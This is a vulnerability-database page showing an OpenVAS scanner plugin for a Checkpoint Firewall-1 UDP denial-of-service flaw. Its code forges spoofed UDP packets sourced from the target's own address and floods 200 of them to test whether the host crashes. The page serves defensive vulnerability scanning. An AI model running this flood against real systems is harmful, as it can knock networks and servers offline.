Lucene search

K

Checkpoint Firewall-1 UDP denial of service

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2003 Michel ArboiType 
openvas
 openvas
🔗 plugins.openvas.org👁 87 Views

Checkpt Firewall-1 UDP denial of service impac

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Refs
Code
SourceLink
securityfocuswww.securityfocus.com/bid/1419
# SPDX-FileCopyrightText: 2003 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11905");
  script_version("2023-08-03T05:05:16+0000");
  script_tag(name:"last_modification", value:"2023-08-03 05:05:16 +0000 (Thu, 03 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/1419");
  script_tag(name:"cvss_base", value:"7.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_name("Checkpoint Firewall-1 UDP denial of service");
  script_category(ACT_FLOOD);
  script_copyright("Copyright (C) 2003 Michel Arboi");
  script_family("Denial of Service");
  script_dependencies("global_settings.nasl", "os_detection.nasl");
  script_exclude_keys("keys/islocalhost", "keys/TARGET_IS_IPV6", "Host/runs_windows");

  script_tag(name:"solution", value:"If this is a FW-1, enable the antispoofing rule. Otherwise,
  contact your software vendor for a patch.");

  script_tag(name:"impact", value:"An attacker may use this flaw to shut down this server, thus
  preventing you from working properly.");

  script_tag(name:"affected", value:"This attack was known to work against Firewall-1 3.0, 4.0 or 4.1.");

  script_tag(name:"summary", value:"The machine (or a router on the way) crashed when it was flooded by
  incorrect UDP packets.");

  script_tag(name:"solution_type", value:"Mitigation");
  script_tag(name:"qod_type", value:"remote_probe");

  exit(0);
}

if( TARGET_IS_IPV6() ) exit( 0 );
if( islocalhost() ) exit( 0 );

# Ensure that the host is still up
start_denial();
sleep( 2 );
up = end_denial();
if( ! up ) exit( 0 );

id = rand() % 65535 + 1;
sp = rand() % 65535 + 1;
dp = rand() % 65535 + 1;

start_denial();

ip = forge_ip_packet( ip_v:4, ip_hl:5, ip_tos:0, ip_off:0,
                      ip_p:IPPROTO_UDP, ip_id:id, ip_ttl:0x40,
                      ip_src:get_host_ip() );
udp = forge_udp_packet( ip:ip, uh_sport:sp, uh_dport:dp, uh_ulen:8 + 1, data:"X" );

send_packet( udp, pcap_active:FALSE ) x 200;

alive = end_denial();

if( ! alive ) {
  security_message( port:0, proto:"udp" );
  set_kb_item( name:"Host/dead", value:TRUE );
  exit( 0 );
}

exit( 99 );

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Nov 2005 00:00Current
7.3High risk
Vulners AI Score7.3
87
.json
Report